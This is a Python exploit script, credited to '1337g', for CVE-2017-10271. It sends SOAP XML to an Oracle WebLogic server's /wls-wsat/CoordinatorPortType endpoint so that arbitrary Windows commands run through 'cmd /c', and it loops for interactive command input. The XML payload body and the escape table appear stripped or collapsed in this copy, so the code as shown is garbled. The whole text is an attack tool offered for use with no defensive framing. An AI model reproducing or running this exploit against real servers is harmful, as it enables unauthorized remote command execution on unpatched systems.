import requests import sys url_in = sys.argv[1] payload_url = url_in + "/wls-wsat/CoordinatorPortType" payload_header = {'content-type': 'text/xml'} def payload_command (command_in): html_escape_table = { "&": "&", '"': """, "'": "'", ">": ">", "<": "<", } command_filtered = ""+"".join(html_escape_table.get(c, c) for c in command_in)+"" payload_1 = " \n" \ " " \ " \n" \ " \n" \ " \n" \ " " \ " " \ " cmd " \ " " \ " " \ " /c " \ " " \ " " \ + command_filtered + \ " " \ " " \ " " \ " " \ " " \ " " \ " " \ " " \ "" return payload_1 def do_post(command_in): result = requests.post(payload_url, payload_command(command_in ),headers = payload_header) if result.status_code == 500: print "Command Executed \n" else: print "Something Went Wrong \n" print "***************************************************** \n" \ "**************** Coded By 1337g ****************** \n" \ "* CVE-2017-10271 Blind Remote Command Execute EXP * \n" \ "***************************************************** \n" while 1: command_in = raw_input("Eneter your command here: ") if command_in == "exit" : exit(0) do_post(command_in)